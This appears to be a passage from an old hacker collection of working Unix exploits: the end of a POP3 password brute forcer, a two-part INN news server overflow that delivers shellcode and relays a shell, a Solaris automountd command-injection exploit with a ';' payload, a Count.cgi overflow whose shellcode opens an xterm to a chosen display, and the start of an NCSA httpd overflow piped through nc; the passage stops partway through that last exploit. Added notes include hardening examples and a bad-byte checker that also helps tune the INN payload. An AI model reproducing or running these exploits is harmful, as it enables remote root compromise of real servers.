      if(ch == EOF)
      {
         *in='\0';
         return NULL;
      }
      if(ch == '\r') continue;
      if(ch == '\n')
      {
         *in='\0';
         return buff;
      }
      if(in - buff < 511)
      {
         *in=(char)ch;
         in++;
      }
   }
}

void swallow_welcome(void)
{
   char b[512];  
   popfp=fdopen(popfd, "rt");      
   getanswer(b);
}


void hackity_hack(void)
{
   char *un;
   char *pw;
   char *c;
   int found=0;
   
   un=(char *)malloc(512);
   pw=(char *)malloc(512);
   if(un==NULL || pw==NULL) return;
   
   userfile=fopen(user, "rt");
   dictfile=fopen(dict, "rt");
   if(userfile == NULL || dictfile == NULL) return;
   
   for(;;)
   {
      while(fgets(un, 50, userfile) != NULL)
      {
         found=0;
         c=strchr(un, 10);
         if(c != NULL) *c=0;
         
         c=strchr(un, 13);
         if(c != NULL) *c=0;
         
         while(fgets(pw, 50, dictfile) != NULL && found==0)
         {
            c=strchr(pw, 10);
            if(c != NULL) *c=0;
            
            c=strchr(pw, 13);
            if(c != NULL) *c=0;
            
            if(strlen(pw) > 2 && strlen(un) > 2)
               if(pop_guess(un, pw)==0)
               {
                  found=1;
                  fclose(popfp);
                  close(popfd);
                  if(RECONNECT==0)
                  {
                     free(pw);
                     free(un);
                     fclose(userfile);
                     fclose(dictfile);
                     exit(0);
                  }
                  pop_connect(host);
                  swallow_welcome();               
               }                           
         }
         fclose(dictfile);
         dictfile=fopen(dict, "rt");
      }
      fclose(dictfile);
      fclose(userfile);
      free(un);
      free(pw);
      exit(0);
   }
}
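The two things the quoted post noticed (unlimited guesses, no log of bad ones) are what make that program worth running. Below, as an example added here and not part of the brute forcer or of any real POP3 daemon, is the AUTHORIZATION-state half of a POP3 server done the other way: a cap on failed logins per connection, a log line for every bad USER/PASS pair, and the same -ERR for an unknown user as for a wrong password so USER can't be used to enumerate accounts. The account table and the "log" (a buffer) are constructed for the example; guesses_allowed() replays what the brute forcer does against it.

```c
#include <stdio.h>
#include <string.h>

#define MAX_FAILURES 3

struct pop3_conn {
    char user[64];          /* name from the last USER, "" until one is given */
    char peer[32];          /* client address, for the log line */
    int failures;           /* bad PASS attempts on this connection */
    int closed;             /* server would have hung up */
    int authed;
    char lastlog[160];      /* stand-in for syslog: the last line "written" */
};

/* Constructed account table standing in for the password file. */
static const struct { const char *name, *pass; } accounts[] = {
    { "alice", "correct horse" },
    { "bob",   "hunter2" },
};

/* Unknown user and wrong password give the same answer, so USER/PASS can't
 * be used to find out which accounts exist. */
static int check_password(const char *user, const char *pass)
{
    for (size_t i = 0; i < sizeof accounts / sizeof accounts[0]; i++)
        if (strcmp(accounts[i].name, user) == 0)
            return strcmp(accounts[i].pass, pass) == 0;
    return 0;
}

void pop3_init(struct pop3_conn *c, const char *peer)
{
    memset(c, 0, sizeof *c);
    snprintf(c->peer, sizeof c->peer, "%s", peer);
}

/* Handle one AUTHORIZATION-state command (CRLF already stripped); returns the reply. */
const char *pop3_handle(struct pop3_conn *c, const char *line)
{
    if (c->closed) return "-ERR connection closed";
    if (strncmp(line, "USER ", 5) == 0) {
        snprintf(c->user, sizeof c->user, "%s", line + 5);
        return "+OK send PASS";          /* never "-ERR no such user" */
    }
    if (strncmp(line, "PASS ", 5) == 0) {
        if (c->user[0] == '\0') return "-ERR USER first";
        if (check_password(c->user, line + 5)) {
            c->authed = 1;
            return "+OK maildrop locked and ready";
        }
        c->failures++;
        /* the logging the quoted post found missing: who, from where, how often;
         * the password itself is deliberately not logged */
        snprintf(c->lastlog, sizeof c->lastlog, "pop3: failed login for %s from %s (%d/%d)",
                 c->user, c->peer, c->failures, MAX_FAILURES);
        c->user[0] = '\0';                /* RFC 1939: after a failed PASS, USER again */
        if (c->failures >= MAX_FAILURES) {
            c->closed = 1;                /* hang up: a few guesses per connection, not a dictionary */
            return "-ERR too many failed logins, closing";
        }
        return "-ERR invalid login";
    }
    if (strcmp(line, "QUIT") == 0) { c->closed = 1; return "+OK bye"; }
    return "-ERR unknown command";
}

/* Replay what the brute forcer above does (USER/PASS per dictionary word,
 * stop on a hit) and return how many guesses got through before the server
 * dropped the connection. */
int guesses_allowed(const char *user, const char **dict, int ndict)
{
    struct pop3_conn c;
    char cmd[128];
    int tried = 0;
    pop3_init(&c, "10.0.0.7");
    for (int i = 0; i < ndict && !c.closed && !c.authed; i++) {
        snprintf(cmd, sizeof cmd, "USER %s", user);
        pop3_handle(&c, cmd);
        snprintf(cmd, sizeof cmd, "PASS %s", dict[i]);
        pop3_handle(&c, cmd);
        tried++;
    }
    return tried;
}

int main(void)
{
    const char *dict[] = { "password", "123456", "letmein", "hunter2", "qwerty" };
    struct pop3_conn c;
    pop3_init(&c, "10.0.0.7");
    printf("S: %s\n", pop3_handle(&c, "USER nobody"));
    printf("S: %s\n", pop3_handle(&c, "PASS guess"));
    printf("log: %s\n", c.lastlog);
    printf("guesses before hangup: %d (dictionary has 5, bob's password is the 4th)\n",
           guesses_allowed("bob", dict, 5));
    return 0;
}
```

With RECONNECT set to 1 the brute forcer above would simply reconnect and carry on, so the per-connection cap alone only slows it down; the log line is what lets somebody notice the hundreds of connections, and a per-source delay or lockout is the next step.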

Anyway, you will probably need one of these thingies: the INN exploit. It comes
in two parts: innbuf writes the overflow data (NOP sled, shellcode and return
addresses, wrapped in a fake news article) to a file, and nnrp connects to the
news port, sends POST, feeds it that file and then hands you the shell.
----------------------------- innbuf.c --------------------------------
/*
 * This just generates the x86 shellcode and puts it in a file that nnrp
 * can send. The offset and/or esp may need changing. To compile
 * on most systems: cc innbuf.c -o innbuf. Usage: innbuf [offset] > file.
 * (C) 1997 by Method <method@arena.cwnet.com>
 * P.S. Feel free to port this to other OS's.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>     /* strlen, memset */
#include <unistd.h>
#include <sys/types.h>

#define DEFAULT_OFFSET  792
#define BUFFER_SIZE     796
#define ADDRS           80

u_long get_esp()
{
        return(0xefbf95e4);
}

int main(int argc, char **argv)
{
        char *buff = NULL;
        u_long *addr_ptr = NULL;
        char *ptr = NULL;
        int ofs = DEFAULT_OFFSET;
        int noplen;
        u_long addr;
        int i;
        u_char execshell[] =
                "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
                "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
                "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
                "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

        if(argc > 1)
                ofs = atoi(argv[1]);

        addr = get_esp() - ofs;

        if(!(buff = malloc(4096))) {
                fprintf(stderr, "can't allocate memory\n");
                exit(1);
        }
        ptr = buff;
        noplen = BUFFER_SIZE - strlen(execshell) - ADDRS;
        memset(ptr, 0x90, noplen);
        ptr += noplen;
        for(i = 0; i < strlen(execshell); i++)
                *ptr++ = execshell[i];
        addr_ptr = (unsigned long *)ptr;
        for(i = 0; i < ADDRS / 4; i++)
                *addr_ptr++ = addr;
        ptr = (char *)addr_ptr;
        *ptr = '\0';

        /* the egg goes out as the From: header of an otherwise harmless article */
        printf(
                "Path: dev.null!nntp\n"
                "From: devNull @%s\n"
                "Newsgroups: alt.test\n"
                "Subject: 4 out of 5 Dweebs prefer INND for getting r00t\n"
                "Message-ID: <830201540.9220@dev.null.com>\n"
                "Date: 9 Jun 1997 15:15:15 GMT\n"
                "Lines: 1\n"
                "\n"
                "this line left not left intentionally blank\n"
                ".\n", buff);
        return 0;
}

---------------------------------------------------------------------------

---------------------------- nnrp.c --------------------------------------
/*
 * Remote exploit for INN version < 1.6. Requires 'innbuf' program to operate.
 * To compile: cc nnrp.c -o nnrp. Usage: nnrp <host> <file generated by innbuf>.
 * (C) 1997 by Method of Dweebs <method@arena.cwnet.com>
 */

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <sys/time.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>
#include <arpa/inet.h>  /* inet_aton */
#include <netdb.h>
#include <limits.h>
#include <errno.h>
#include <fcntl.h>
#include <time.h>

#define POST            "POST\n"

#define SAY(a, b)       write(a, b, strlen(b))
/* leave one byte for the '\0' send_egg() appends */
#define CHOMP(a, b)     read(a, b, sizeof(b) - 1)
#define basename(a)     bname(a)

char *me;

void make_addr(char *name, struct in_addr *addr)
{
        struct hostent *hp;

        if(inet_aton(name, addr) == 0) {
                if(!(hp = gethostbyname(name))) {
                        fprintf(stderr, "%s: ", me);
                        herror(name);
                        exit(1);
                }
                addr->s_addr = ((struct in_addr *)hp->h_addr)->s_addr;
        }
}

char *bname(char *str)
{
        char *cp;

        if((cp = (char *)strrchr(str, '/')) != NULL)
                return(++cp);
        else
                return(str);
}

void my_err(char *errstr, int err)
{
        fprintf(stderr, "%s: ", me);
        perror(errstr);
        exit(err);
}

void usage()
{
        printf(
                "INN version 1.[45].x exploit by Method <method@arena.cwnet.com>\n"
                "Usage: %s <host> <filename>\n"
                "Will start a shell on the remote host.\n"
                "The second argument is the file containing the overflow data.\n",
                me);
        exit(1);
}

/* Relay stdin to the socket and the socket to stdout until the far end closes. */
void select_loop(int netfd)
{
        int ret, n, in = STDIN_FILENO, out = STDOUT_FILENO;
        char buf[512];
        fd_set rfds;

        for( ; ; ) {
                FD_ZERO(&rfds);
                FD_SET(in, &rfds);
                FD_SET(netfd, &rfds);

                if((ret = select(netfd + 1, &rfds, NULL, NULL, NULL)) < 0)
                        my_err("select", 1);

                if(!ret)
                        continue;

                if(FD_ISSET(in, &rfds)) {
                        if((n = read(in, buf, sizeof(buf))) > 0)
                                write(netfd, buf, n);
                }

                if(FD_ISSET(netfd, &rfds)) {
                        if((n = read(netfd, buf, sizeof(buf))) > 0)
                                write(out, buf, n);
                        else
                                break;
                }
        }
}

int news_sock(char *host)
{
        struct sockaddr_in sin;
        int sock;

        sin.sin_port = htons(119);
        sin.sin_family = AF_INET;
        make_addr(host, &(sin.sin_addr));

        if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
                my_err("socket", 1);

        if(connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0)
                my_err("connect", 1);

        return(sock);
}

void send_egg(int sk, char *file)
{
        char buf[BUFSIZ];
        int dfd;
        int n;

        if((dfd = open(file, O_RDONLY)) < 0)
                my_err("open", 1);

        printf("Executing innd exploit.. be patient.\n");

        /* greeting, then the reply to POST (340 if the server lets us post) */
        if((n = CHOMP(sk, buf)) < 0)
                my_err("read", 1);
        buf[n] = '\0';
        fputs(buf, stdout);
        SAY(sk, POST);
        if((n = CHOMP(sk, buf)) < 0)
                my_err("read", 1);
        buf[n] = '\0';
        fputs(buf, stdout);
        sleep(2);
        printf("Sending overflow data.\n");
        while((n = CHOMP(dfd, buf)) > 0)
                write(sk, buf, n);
        sleep(2);
}

int main(int argc, char **argv)
{
        char *victim, *filename;
        int s;

        me = basename(argv[0]);

        if(argc != 3)
                usage();

        filename = argv[2];

        send_egg(s = news_sock(victim = argv[1]), filename);

        select_loop(s);
        fprintf(stderr, "Connection closed.\n");
        printf("Remember: Security is futile. Dweebs WILL own you.\n");
        return 0;
}

---------------------------------------------------------------------------
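Before firing that at anything, look at what actually goes over the wire: the egg is sent as the From: header of a news article, so a NUL, CR or LF anywhere in it (in the shellcode or in the return address bytes) ends the line early and the overflow never reaches the stack. The program below is an example added here, not part of Method's code; it rebuilds the egg the way innbuf does (the shellcode bytes are innbuf's, the 0xefbf95e4 / 792 / 796 / 80 constants are its defaults) and scans it for those bytes, so a new esp guess or offset can be checked before it is sent.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

/* innbuf's BSD execve("/bin/sh") shellcode, copied from the page above */
static const uint8_t bsd_execshell[] =
    "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
    "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
    "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
    "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
#define BSD_EXECSHELL_LEN (sizeof bsd_execshell - 1)

/* Lay out the egg exactly as innbuf does: NOP sled, shellcode, then addr_bytes
 * worth of little-endian copies of addr. Returns the total length, or 0 if the
 * pieces don't fit in buffer_size. */
size_t build_egg(uint8_t *out, size_t buffer_size,
                 const uint8_t *sc, size_t sclen, uint32_t addr, size_t addr_bytes)
{
    if (sclen + addr_bytes > buffer_size || addr_bytes % 4 != 0) return 0;
    size_t noplen = buffer_size - sclen - addr_bytes;
    memset(out, 0x90, noplen);
    memcpy(out + noplen, sc, sclen);
    uint8_t *p = out + noplen + sclen;
    for (size_t i = 0; i < addr_bytes; i += 4) {
        p[i]     = (uint8_t)(addr & 0xff);          /* x86: least significant byte first */
        p[i + 1] = (uint8_t)((addr >> 8) & 0xff);
        p[i + 2] = (uint8_t)((addr >> 16) & 0xff);
        p[i + 3] = (uint8_t)((addr >> 24) & 0xff);
    }
    return buffer_size;
}

/* Index of the first byte a line-oriented text protocol will not carry
 * intact (NUL stops string copies, LF ends the header line, CR is stripped
 * or ends it too), or -1 if the egg is clean. */
long first_bad_byte(const uint8_t *egg, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (egg[i] == 0x00 || egg[i] == '\n' || egg[i] == '\r') return (long)i;
    return -1;
}

/* innbuf's defaults: esp guess 0xefbf95e4, offset 792, 796-byte buffer,
 * 80 bytes (20 copies) of return address. -2 means it didn't fit. */
long check_innbuf_defaults(void)
{
    uint8_t egg[4096];
    size_t n = build_egg(egg, 796, bsd_execshell, BSD_EXECSHELL_LEN, 0xefbf95e4u - 792u, 80);
    return n == 0 ? -2 : first_bad_byte(egg, n);
}

/* Same egg with some other return address, to see whether that guess survives. */
long check_bad_address(uint32_t addr)
{
    uint8_t egg[4096];
    size_t n = build_egg(egg, 796, bsd_execshell, BSD_EXECSHELL_LEN, addr, 80);
    return n == 0 ? -2 : first_bad_byte(egg, n);
}

int main(int argc, char **argv)
{
    /* same argument as innbuf: the offset subtracted from the esp guess */
    uint32_t ofs = argc > 1 ? (uint32_t)strtoul(argv[1], NULL, 0) : 792u;
    uint32_t addr = 0xefbf95e4u - ofs;
    uint8_t egg[4096];
    size_t n = build_egg(egg, 796, bsd_execshell, BSD_EXECSHELL_LEN, addr, 80);
    long bad = first_bad_byte(egg, n);
    printf("egg: %zu bytes, sled %zu, ret=0x%08x: %s", n, n - BSD_EXECSHELL_LEN - 80,
           (unsigned)addr, bad < 0 ? "clean\n" : "byte NNTP will mangle at index ");
    if (bad >= 0) printf("%ld\n", bad);
    return bad < 0 ? 0 : 1;
}
```

With the defaults the egg is 796 bytes, 648 of them NOPs, and clean. A guess such as 0xbfff0a10 shows up as index 717, the second byte of the first address copy, which the server would take as the end of the From: line; that is worth ruling out before blaming the offset when an attempt fails.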


hehehehhahaha... kewl, huh ?
And there is automountd, on SunOS 5.5.1 (Solaris 2.5.1)... :)
This one isn't an overflow: the AUTOFS_MOUNT RPC call takes a map name and a
key, and if the map is executable automountd runs it through popen() with the
key on the command line, so a key containing ';' runs whatever comes after it
with automountd's privileges (it runs as root). As written it talks to the
local automountd (gethostname()); put another host into clnt_create() to use
it remotely.

/*
 This is a really dumb automountd exploit, tested on Solaris 2.5.1.
 ./r blahblah /bin/chmod "777 /etc; 2nd cmd; 3rd cmd" and so on:
 the map is executed via popen() with the key given as its argument
 (read automount(1M)), so anything the shell understands in the key runs too.

 Patch 10465[45] fixes this.

 */

#include <sys/types.h>
#include <sys/time.h>
#include <stdio.h>
#include <stdlib.h>     /* exit */
#include <string.h>
#include <unistd.h>     /* gethostname */
#include <netdb.h>
#include <rpc/rpc.h>
#include <rpcsvc/autofs_prot.h>

#define AUTOTS "datagram_v" /* XXX */

void usage(char *s) {
  printf("Usage: %s mountpoint map key [opts]\n", s);
  exit(0);
}

/* XDR routines for the request and reply, as generated from autofs_prot.x */
bool_t
xdr_mntrequest(XDR *xdrs, mntrequest *objp)
{
        if (!xdr_string(xdrs, &objp->name, A_MAXNAME))
                return (FALSE);
        if (!xdr_string(xdrs, &objp->map, A_MAXNAME))
                return (FALSE);
        if (!xdr_string(xdrs, &objp->opts, A_MAXOPTS))
                return (FALSE);
        if (!xdr_string(xdrs, &objp->path, A_MAXPATH))
                return (FALSE);
        return (TRUE);
}

bool_t
xdr_mntres(XDR *xdrs, mntres *objp)
{
        if (!xdr_int(xdrs, &objp->status))
                return (FALSE);
        return (TRUE);
}

int main(int argc, char *argv[]) {
  char hostname[MAXHOSTNAMELEN];
  CLIENT *cl;
  enum clnt_stat stat;
  struct timeval tm;
  struct mntrequest req;
  struct mntres result;

  if (argc < 4)
    usage(argv[0]);

  /* path = mount point, map = program to run, name = key handed to it */
  req.path=argv[1];
  req.map=argv[2];
  req.name=argv[3];
  req.opts=(argc > 4) ? argv[4] : "";   /* opts is optional; xdr_string() won't encode a NULL */
  if (gethostname(hostname, sizeof(hostname)) == -1) {
    perror("gethostname");
    exit(0);
  }
  /* talks to the local automountd; put another host here to do it remotely */
  if ((cl=clnt_create(hostname, AUTOFS_PROG, AUTOFS_VERS, AUTOTS)) == NULL) {
    clnt_pcreateerror("clnt_create");
    exit(0);
  }
  tm.tv_sec=5;
  tm.tv_usec=0;
  stat=clnt_call(cl, AUTOFS_MOUNT, xdr_mntrequest, (char *)&req, xdr_mntres,
                (char *)&result, tm);
  if (stat != RPC_SUCCESS)
    clnt_perror(cl, "mount call");
  else
    printf("mntres = %d.\n", result.status);
  clnt_destroy(cl);
  return 0;
}
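The bug is the popen() call, not RPC: the map program and the key get glued into one string and handed to /bin/sh, so a ';' in the key starts a second command. Below, as an example added here (not the exploit author's code and not automountd's), the two ways of running a map program side by side; echo stands in for the map program so it runs anywhere, and the key carries the kind of payload the comment above describes. The fixed version forks and execs the program with the key as a single argv element, so nothing ever interprets it.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Vulnerable way: "<prog> <key>" becomes one shell command line. */
int run_map_popen(const char *prog, const char *key, char *out, size_t outlen)
{
    char cmd[512];
    FILE *fp;
    size_t n;
    snprintf(cmd, sizeof cmd, "%s %s", prog, key);
    if ((fp = popen(cmd, "r")) == NULL) return -1;
    n = fread(out, 1, outlen - 1, fp);
    out[n] = '\0';
    return pclose(fp);
}

/* Fixed way: fork and exec the program directly with the key as one argv
 * element. No shell runs, so ';', '|', '`' and $(...) are just bytes in argv[1]. */
int run_map_execv(const char *prog, const char *key, char *out, size_t outlen)
{
    int fds[2], status;
    size_t n = 0;
    ssize_t r;
    pid_t pid;
    if (pipe(fds) < 0) return -1;
    if ((pid = fork()) < 0) return -1;
    if (pid == 0) {
        char *argv[] = { (char *)prog, (char *)key, NULL };
        dup2(fds[1], STDOUT_FILENO);
        close(fds[0]);
        close(fds[1]);
        execvp(prog, argv);     /* a real fix would use the map's absolute path */
        _exit(127);
    }
    close(fds[1]);
    while (n < outlen - 1 && (r = read(fds[0], out + n, outlen - 1 - n)) > 0)
        n += (size_t)r;
    out[n] = '\0';
    close(fds[0]);
    waitpid(pid, &status, 0);
    return status;
}

/* 1 if the smuggled command ran, i.e. "INJECTED" came out on a line of its own. */
int injection_worked(int (*runner)(const char *, const char *, char *, size_t))
{
    char out[256];
    runner("echo", "foo; echo INJECTED", out, sizeof out);
    return strstr(out, "\nINJECTED\n") != NULL;
}

int main(void)
{
    printf("popen():  injection %s\n", injection_worked(run_map_popen) ? "WORKED" : "blocked");
    printf("execvp(): injection %s\n", injection_worked(run_map_execv) ? "WORKED" : "blocked");
    return 0;
}
```

Through popen() the output is two lines ("foo", then "INJECTED"); through fork/exec it is the single line "foo; echo INJECTED", the key printed back verbatim. Quoting or filtering the key is the weaker fix, since the set of characters the shell cares about is longer than people remember; not invoking a shell at all is what the patch has to amount to.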

Now, this here is very dangerous: it exploits Count.cgi (wwwcount), the hit
counter CGI that lots of web servers carry in cgi-bin, by overflowing it through
the query string. As written it prints the HTTP request to stdout; the
commented-out lines at the bottom show the other ways to use it (run the CGI
locally with QUERY_STRING set). :)


/*

Count.cgi (wwwcount) linux  test exploit
(c) 05/1997 by plaguez  -  dube0866@eurobretagne.fr
Contact me if you manage to improve this crap.

This program needs drastic changes to be useable.
If you can't understand how to modify it for your own purpose,
please do not consider trying it.

*/

#include <stdio.h>
#include <stdlib.h>     /* atoi, setenv, system */
#include <string.h>     /* strcpy, strlen */

char shell[]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xeb\x3c\x5e\x31\xc0\x89\xf1\x8d"
"\x5e\x18\x88\x46\x2c\x88\x46\x30"
"\x88\x46\x39\x88\x46\x4b\x8d\x56"
"\x20\x89\x16\x8d\x56\x2d\x89\x56"
"\x04\x8d\x56\x31\x89\x56\x08\x8d"
"\x56\x3a\x89\x56\x0c\x8d\x56\x10"
"\x89\x46\x10\xb0\x0b\xcd\x80\x31"
"\xdb\x89\xd8\x40\xcd\x80\xe8\xbf"
"\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff"
"/usr/X11R6/bin/xterm0-ut0-display0"
"127.000.000.001:00"
"\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff";

/*

Assembly stuff for the previous buffer.
This basically implements an execve syscall, by creating
an array of char* (needs to put a null byte at the end of
all strings).
Here we're going to exec an xterm and send it to our host.
(you can't simply exec a shell due to the cgi proto).
The trailing "0" of each string below is a placeholder: the query string
can't carry NUL bytes, so the movb's write them at run time.

        jmp    60
        popl   %esi
        xorl   %eax,%eax           # clear eax
        movl   %esi,%ecx           # get the buffer address (argv)
        leal   0x18(%esi),%ebx     # get the address of the strings (path)
        movb   %al,0x2c(%esi)      # NUL-terminate the strings
        movb   %al,0x30(%esi)      #
        movb   %al,0x39(%esi)
        movb   %al,0x4b(%esi)
        leal   0x20(%esi),%edx     # build the char**
        movl   %edx,(%esi)
        leal   0x2d(%esi),%edx
        movl   %edx,0x4(%esi)
        leal   0x31(%esi),%edx
        movl   %edx,0x8(%esi)
        leal   0x3a(%esi),%edx
        movl   %edx,0xc(%esi)
        leal   0x10(%esi),%edx
        movl   %eax,0x10(%esi)
        movb   $0xb,%al
        int    $0x80                #  enter the kernel (execve)
        xorl   %ebx,%ebx            #  exit cleanly (exit())
        movl   %ebx,%eax            #  if execve() ever fails.
        inc    %eax                 #
        int    $0x80                #
        call   -65                  #  back to the popl, pushing the address of the strings
        .byte  0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff
        .byte  0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff
        .byte  0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff
        .ascii \"/usr/X11R6/bin/xterm0\"         # 44
        .ascii \"-ut0\"                          # 48
        .ascii \"-display0\"                     # 57
        .ascii \"127.000.000.001:00\"            # 75 (end of the strings)
        .byte  0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff
        .byte  0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff
            ...
 */

char qs[7000];
char chaine[]="user=a";

unsigned long getesp() {
   //   asm("movl %esp,%eax");
   return 0xbfffee38;
}

int main(int argc, char **argv) {
   int compt;
   long stack;

   stack=getesp();

   if(argc>1)
     stack+=atoi(argv[1]);

   /* 4132 bytes (1033 copies) of the guessed return address, little-endian */
   for(compt=0;compt<4132;compt+=4) {
      qs[compt+0] = stack &  0x000000ff;
      qs[compt+1] = (stack & 0x0000ff00) >> 8;
      qs[compt+2] = (stack & 0x00ff0000) >> 16;
      qs[compt+3] = (stack & 0xff000000) >> 24;
   }

   /* "user=a" so Count.cgi parses it as a parameter; the NUL strcpy leaves
      behind becomes a NOP so the addresses stay contiguous */
   strcpy(qs,chaine);
   qs[strlen(chaine)]=0x90;

   /* NOP sled and shellcode follow the addresses */
   strcpy((char*)&qs[4132],shell);

   /* Choose what to do here */
   printf("GET /cgi-bin/Count.cgi?%s\n\n",qs);
   /*fprintf(stderr,"\n\nadresse: %x0x\n",stack);
   printf("GET /cgi-bin/Count.cgi?%s HTTP/1.0\nUser-Agent: %x\n\n",qs,stack);
   setenv("QUERY_STRING",qs,1);
   system("/usr/local/etc/httpd/cgi-bin/Count.cgi");
   system("/bin/sh");*/

   return 0;
}



And of course, The HTTPD Exploit ... :)

/*
 * NCSA 1.3 Linux/intel remote xploit by savage@apostols.org 1997-April-23
 *
 * Special THANKS to: b0fh,|r00t,eepr0m,moxx,Fr4wd,Kore,EDevil and the rest of
 * ToXyn !!!
 *
 * usage:
 *      $ (hackttpd 0; cat) | nc victim 143
 *                  |
 *                  +--> usually from -1000 to 1000 (try steeps of 100)
 */

#include <stdio.h>

unsigned char shell[] = {
'/',0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0xeb,0x27,0x5e,0x31,0xed,0x31,0xc9,0x31,0xc0,0x88,0x6e,6,0x89,0xf3,0x89,0x76,
0x24,0x89,0x6e,0x28,0x8d,0x6e,0x24,0x89,0xe9,0x8d,0x6e,0x28,0x89,0xea,0xb0,0x0b,
0xcd,0x80,0x31,0xdb,0x89,0xd8,0x40,0xcd,0x80,0xe8,0xd4,0xff,0xff,0xff,
'b','i','n','/','s','h'
};

char username[256+8];

void main(int argc, char *argv[]) {
        int i,a;
        long val;

        if(argc>1)
                a=atoi(argv[1]);
        else
                a=0;

        strcpy(username,shell);

        for(i=strlen(shell);i<sizeof(username);i++)
                username[i]=0x90; /* NOP */

        val = 0xbfff537c + 4 + a;

        i=sizeof(username)-4;
        {
                username[i+0] = val & 0x000000ff;
                username[i+1] = (val & 0x0000ff00) >> 8;
                username[i+2] = (val & 0x00ff0000) >> 16;
